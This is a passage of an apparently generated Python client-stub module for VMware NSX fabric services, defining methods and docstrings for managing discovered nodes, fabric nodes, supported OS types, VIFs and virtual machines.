            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get', {'node_ext_id': node_ext_id})

    def hostprep(self, node_ext_id):
        """
        Invoke the ``hostprep`` operation for a discovered node.

        :type  node_ext_id: :class:`str`
        :param node_ext_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.Node. The return value will contain all
            the attributes defined in :class:`com.vmware.nsx.model_client.Node`.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('hostprep', {'node_ext_id': node_ext_id})

    def list(self, cm_local_id=None, cursor=None, display_name=None,
             external_id=None, has_parent=None, included_fields=None,
             ip_address=None, node_id=None, node_type=None, origin_id=None,
             page_size=None, parent_compute_collection=None,
             sort_ascending=None, sort_by=None):
        """
        Return information about all discovered nodes.

        :type  cm_local_id: :class:`str` or ``None``
        :param cm_local_id: Local id of the discovered node in the compute
            manager. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  display_name: :class:`str` or ``None``
        :param display_name: Display name of the discovered node. (optional)
        :type  external_id: :class:`str` or ``None``
        :param external_id: External id of the discovered node, e.g. a mo-ref
            from VC. (optional)
        :type  has_parent: :class:`str` or ``None``
        :param has_parent: Whether the discovered node has a parent compute
            collection or is a standalone host; see the ``LIST_HAS_PARENT_*``
            class attributes. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  ip_address: :class:`str` or ``None``
        :param ip_address: IP address of the discovered node. (optional)
        :type  node_id: :class:`str` or ``None``
        :param node_id: Id of the fabric node created from the discovered
            node. (optional)
        :type  node_type: :class:`str` or ``None``
        :param node_type: Discovered node type, e.g. HostNode. (optional)
        :type  origin_id: :class:`str` or ``None``
        :param origin_id: Id of the compute manager from which this node was
            discovered. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  parent_compute_collection: :class:`str` or ``None``
        :param parent_compute_collection: External id of the compute
            collection to which this node belongs. (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.DiscoveredNodeListResult`
        :return: Paged list of discovered nodes.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'cm_local_id': cm_local_id,
            'cursor': cursor,
            'display_name': display_name,
            'external_id': external_id,
            'has_parent': has_parent,
            'included_fields': included_fields,
            'ip_address': ip_address,
            'node_id': node_id,
            'node_type': node_type,
            'origin_id': origin_id,
            'page_size': page_size,
            'parent_compute_collection': parent_compute_collection,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)

    def reapplyclusterconfig(self, node_ext_id):
        """
        Invoke the ``reapplyclusterconfig`` operation for a discovered node.

        :type  node_ext_id: :class:`str`
        :param node_ext_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNode`
        :return: com.vmware.nsx.model.TransportNode
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('reapplyclusterconfig', {'node_ext_id': node_ext_id})
class Nodes(VapiInterface):
    """
    Client-side stub for the ``com.vmware.nsx.fabric.nodes`` service, which
    operates on fabric nodes (hosts and edges). Note: per the individual
    method docstrings below, most operations of this service are deprecated
    as part of FN+TN unification in favor of the Transport Node APIs.
    """
    LIST_HYPERVISOR_OS_TYPE_ESXI = "ESXI"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_RHELKVM = "RHELKVM"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_UBUNTUKVM = "UBUNTUKVM"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_HYPERV = "HYPERV"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_RHELCONTAINER = "RHELCONTAINER"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_CENTOSCONTAINER = "CENTOSCONTAINER"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_RHELSERVER = "RHELSERVER"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_UBUNTUSERVER = "UBUNTUSERVER"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_CENTOSSERVER = "CENTOSSERVER"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_CENTOSKVM = "CENTOSKVM"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_SLESKVM = "SLESKVM"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_HYPERVISOR_OS_TYPE_SLESSERVER = "SLESSERVER"
    """
    Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
    """
    LIST_RESOURCE_TYPE_HOSTNODE = "HostNode"
    """
    Possible value for ``resourceType`` of method :func:`Nodes.list`.
    """
    LIST_RESOURCE_TYPE_EDGENODE = "EdgeNode"
    """
    Possible value for ``resourceType`` of method :func:`Nodes.list`.
    """
    LIST_RESOURCE_TYPE_PUBLICCLOUDGATEWAYNODE = "PublicCloudGatewayNode"
    """
    Possible value for ``resourceType`` of method :func:`Nodes.list`.
    """
    PERFORMACTION_ACTION_ENTER_MAINTENANCE_MODE = "enter_maintenance_mode"
    """
    Possible value for ``action`` of method :func:`Nodes.performaction`.
    """
    PERFORMACTION_ACTION_EXIT_MAINTENANCE_MODE = "exit_maintenance_mode"
    """
    Possible value for ``action`` of method :func:`Nodes.performaction`.
    """
    PERFORMACTION_ACTION_GET_MAINTENANCE_MODE_STATE = "get_maintenance_mode_state"
    """
    Possible value for ``action`` of method :func:`Nodes.performaction`.
    """
    PERFORMACTION_VSAN_MODE_EVACUATE_ALL_DATA = "evacuate_all_data"
    """
    Possible value for ``vsanMode`` of method :func:`Nodes.performaction`.
    """
    PERFORMACTION_VSAN_MODE_ENSURE_OBJECT_ACCESSIBILITY = "ensure_object_accessibility"
    """
    Possible value for ``vsanMode`` of method :func:`Nodes.performaction`.
    """
    PERFORMACTION_VSAN_MODE_NO_ACTION = "no_action"
    """
    Possible value for ``vsanMode`` of method :func:`Nodes.performaction`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.nodes'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _NodesStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               node,
               ):
        """
        Creates a host node (hypervisor) or edge node (router) in the transport
        network. When you run this command for a host, NSX Manager attempts to
        install the NSX kernel modules, which are packaged as VIB, RPM, or DEB
        files. For the installation to succeed, you must provide the host login
        credentials and the host thumbprint. To get the ESXi host thumbprint,
        SSH to the host and run the **openssl x509 -in /etc/vmware/ssl/rui.crt
        -fingerprint -sha256 -noout** command. To generate host key thumbprint
        using SHA-256 algorithm please follow the steps below. Log into the
        host, making sure that the connection is not vulnerable to a man in the
        middle attack. Check whether a public key already exists. Host public
        key is generally located at '/etc/ssh/ssh_host_rsa_key.pub'. If the key
        is not present then generate a new key by running the following command
        and follow the instructions. **ssh-keygen -t rsa** Now generate a
        SHA256 hash of the key using the following command. Please make sure to
        pass the appropriate file name if the public key is stored with a
        different file name other than the default 'id_rsa.pub'. **awk '{print
        $2}' id_rsa.pub | base64 -d | sha256sum -b | sed 's/ .\*$//' | xxd -r
        -p | base64** This api is deprecated as part of FN+TN unification.
        Please use Transport Node API POST /transport-nodes to install NSX
        components on a node.
        :type node: :class:`vmware.vapi.struct.VapiStruct`
        :param node: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.Node
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'node': node,
                            })
    def create_0(self,
                 target_node_id,
                 target_uri,
                 ):
        """
        Invoke POST request on target fabric node. This api is deprecated as
        part of FN+TN unification. Please use Transport Node API POST
        /transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create_0',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def delete(self,
               node_id,
               unprepare_host=None,
               ):
        """
        :type node_id: :class:`str`
        :param node_id: (required)
        :type unprepare_host: :class:`bool` or ``None``
        :param unprepare_host: Delete a host and uninstall NSX components (optional, default to
            true)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'node_id': node_id,
                            'unprepare_host': unprepare_host,
                            })
    def delete_0(self,
                 target_node_id,
                 target_uri,
                 ):
        """
        Invoke DELETE request on target fabric node. This api is deprecated as
        part of FN+TN unification. Please use Transport Node API DELETE
        /transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete_0',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def get(self,
            node_id,
            ):
        """
        Returns information about a specific fabric node (host or edge). This
        api is deprecated, use Transport Node API GET
        /transport-nodes/<transport-node-id> to get fabric node information.
        :type node_id: :class:`str`
        :param node_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.Node
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'node_id': node_id,
                            })
    def get_0(self,
              target_node_id,
              target_uri,
              ):
        """
        Invoke GET request on target fabric node. This api is deprecated as
        part of FN+TN unification. Please use Transport Node API GET
        /transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get_0',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def list(self,
             cursor=None,
             discovered_node_id=None,
             display_name=None,
             external_id=None,
             hardware_id=None,
             hypervisor_os_type=None,
             included_fields=None,
             ip_address=None,
             page_size=None,
             resource_type=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns information about all fabric nodes (hosts and edges). This api
        is deprecated as part of FN+TN unification. Please use Transport Node
        API GET /transport-nodes to list all fabric nodes.
        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type discovered_node_id: :class:`str` or ``None``
        :param discovered_node_id: Id of the discovered node which was converted to create this node
            (optional)
        :type display_name: :class:`str` or ``None``
        :param display_name: HostNode display name (optional)
        :type external_id: :class:`str` or ``None``
        :param external_id: HostNode external id (optional)
        :type hardware_id: :class:`str` or ``None``
        :param hardware_id: Hardware Id of the host (optional)
        :type hypervisor_os_type: :class:`str` or ``None``
        :param hypervisor_os_type: HostNode's Hypervisor type, for example ESXi, RHEL KVM or UBUNTU
            KVM. (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type ip_address: :class:`str` or ``None``
        :param ip_address: Management IP address of the node (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type resource_type: :class:`str` or ``None``
        :param resource_type: Node type from 'HostNode', 'EdgeNode', 'PublicCloudGatewayNode'
            (optional)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NodeListResult`
        :return: com.vmware.nsx.model.NodeListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cursor': cursor,
                            'discovered_node_id': discovered_node_id,
                            'display_name': display_name,
                            'external_id': external_id,
                            'hardware_id': hardware_id,
                            'hypervisor_os_type': hypervisor_os_type,
                            'included_fields': included_fields,
                            'ip_address': ip_address,
                            'page_size': page_size,
                            'resource_type': resource_type,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })
    def performaction(self,
                      node_id,
                      action=None,
                      evacuate_powered_off_vms=None,
                      vsan_mode=None,
                      ):
        """
        The supported fabric node actions are enter_maintenance_mode,
        exit_maintenance_mode for EdgeNode. This API is deprecated, please call
        TransportNode maintenance mode API to update maintenance mode, refer to
        \"Update transport node maintenance mode\".
        :type node_id: :class:`str`
        :param node_id: (required)
        :type action: :class:`str` or ``None``
        :param action: Supported fabric node actions (optional)
        :type evacuate_powered_off_vms: :class:`bool` or ``None``
        :param evacuate_powered_off_vms: Evacuate powered-off vms (optional, default to false)
        :type vsan_mode: :class:`str` or ``None``
        :param vsan_mode: Vsan decommission mode (optional, default to
            ensure_object_accessibility)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.Node
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('performaction',
                            {
                            'node_id': node_id,
                            'action': action,
                            'evacuate_powered_off_vms': evacuate_powered_off_vms,
                            'vsan_mode': vsan_mode,
                            })
    def restartinventorysync(self,
                             node_id,
                             ):
        """
        Restart the inventory sync for the node if it is currently internally
        paused. After this action the next inventory sync coming from the node
        is processed. This api is deprecated as part of FN+TN unification.
        Please use Transport Node API POST
        /transport-nodes/<transport-node-id>?action=restart_inventory_sync to
        restart inventory sync of node.
        :type node_id: :class:`str`
        :param node_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('restartinventorysync',
                            {
                            'node_id': node_id,
                            })
    def update(self,
               node_id,
               node,
               ):
        """
        :type node_id: :class:`str`
        :param node_id: (required)
        :type node: :class:`vmware.vapi.struct.VapiStruct`
        :param node: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.Node
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'node_id': node_id,
                            'node': node,
                            })
    def update_0(self,
                 target_node_id,
                 target_uri,
                 ):
        """
        Invoke PUT request on target fabric node. This api is deprecated as
        part of FN+TN unification. Please use Transport Node API PUT
        /transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
        :type target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update_0',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def upgradeinfra(self,
                     node_id,
                     disable_vm_migration=None,
                     ):
        """
        Perform a service deployment upgrade on a host node
        :type node_id: :class:`str`
        :param node_id: (required)
        :type disable_vm_migration: :class:`bool` or ``None``
        :param disable_vm_migration: Should VM migration be disabled during upgrade (optional, default
            to false)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.Node
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.Node`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('upgradeinfra',
                            {
                            'node_id': node_id,
                            'disable_vm_migration': disable_vm_migration,
                            })
class Ostypes(VapiInterface):
    """
    Stub class for the ``com.vmware.nsx.fabric.ostypes`` vAPI service,
    which reports the names of all host operating systems supported by NSX.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.ostypes'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        Build the stub for the ostypes service.

        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _OstypesStub)
        self._VAPI_OPERATION_IDS = {}
    def get(self):
        """
        Returns names of all supported host OS.

        :rtype: :class:`com.vmware.nsx.model_client.SupportedHostOSListResult`
        :return: com.vmware.nsx.model.SupportedHostOSListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # The operation takes no arguments, hence the ``None`` payload.
        return self._invoke('get', None)
class Vifs(VapiInterface):
    """
    Client-side stub for the ``com.vmware.nsx.fabric.vifs`` service; exposes
    the ``list`` operation over virtual network interface (VIF) records.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.vifs'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _VifsStub)
        self._VAPI_OPERATION_IDS = {}
    def list(self,
             cursor=None,
             host_id=None,
             included_fields=None,
             lport_attachment_id=None,
             owner_vm_id=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             vm_id=None,
             ):
        """
        Returns information about all VIFs. A virtual network interface
        aggregates network interfaces into a logical interface unit that is
        indistinguishable from a physical network interface.
        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type host_id: :class:`str` or ``None``
        :param host_id: Id of the host where this vif is located. (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type lport_attachment_id: :class:`str` or ``None``
        :param lport_attachment_id: LPort Attachment Id of the virtual network interface. (optional)
        :type owner_vm_id: :class:`str` or ``None``
        :param owner_vm_id: External id of the virtual machine. (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type vm_id: :class:`str` or ``None``
        :param vm_id: External id of the virtual machine. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.VirtualNetworkInterfaceListResult`
        :return: com.vmware.nsx.model.VirtualNetworkInterfaceListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cursor': cursor,
                            'host_id': host_id,
                            'included_fields': included_fields,
                            'lport_attachment_id': lport_attachment_id,
                            'owner_vm_id': owner_vm_id,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            'vm_id': vm_id,
                            })
class VirtualMachines(VapiInterface):
    """
    Stub class for the ``com.vmware.nsx.fabric.virtual_machines`` vAPI
    service: lists virtual machines and updates the tags applied to them.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.virtual_machines'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        Build the stub for the virtual machines service.

        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _VirtualMachinesStub)
        self._VAPI_OPERATION_IDS = {}
    def list(self,
             cursor=None,
             display_name=None,
             external_id=None,
             host_id=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns information about all virtual machines.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor used to fetch the next page of records
            (supplied by the current result page) (optional)
        :type  display_name: :class:`str` or ``None``
        :param display_name: Display Name of the virtual machine (optional)
        :type  external_id: :class:`str` or ``None``
        :param external_id: External id of the virtual machine (optional)
        :type  host_id: :class:`str` or ``None``
        :param host_id: Id of the host where this vif is located (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields to include in
            the query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page;
            the server may return fewer (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.VirtualMachineListResult`
        :return: com.vmware.nsx.model.VirtualMachineListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # Assemble all query arguments, then dispatch the operation.
        query_args = {
            'cursor': cursor,
            'display_name': display_name,
            'external_id': external_id,
            'host_id': host_id,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', query_args)
    def updatetags(self,
                   virtual_machine_tag_update,
                   ):
        """
        Update tags applied to the virtual machine. The external id of the
        virtual machine is specified in the request body, which must contain
        the complete set of tags to apply; pass an empty list to clear all
        tags. A user can apply at most 25 tags on a virtual machine; the
        remaining 5 are reserved for system defined tags.

        :type  virtual_machine_tag_update: :class:`com.vmware.nsx.model_client.VirtualMachineTagUpdate`
        :param virtual_machine_tag_update: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        payload = {
            'virtual_machine_tag_update': virtual_machine_tag_update,
        }
        return self._invoke('updatetags', payload)
class _ComputeCollectionFabricTemplatesStub(ApiInterfaceStub):
    """
    Generated REST stub for the
    ``com.vmware.nsx.fabric.compute_collection_fabric_templates`` service.
    Declares the input/output types, error maps, and REST metadata for the
    create/delete/get/list/update operations against
    ``/api/v1/fabric/compute-collection-fabric-templates``.
    """
    def __init__(self, config):
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'compute_collection_fabric_template': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
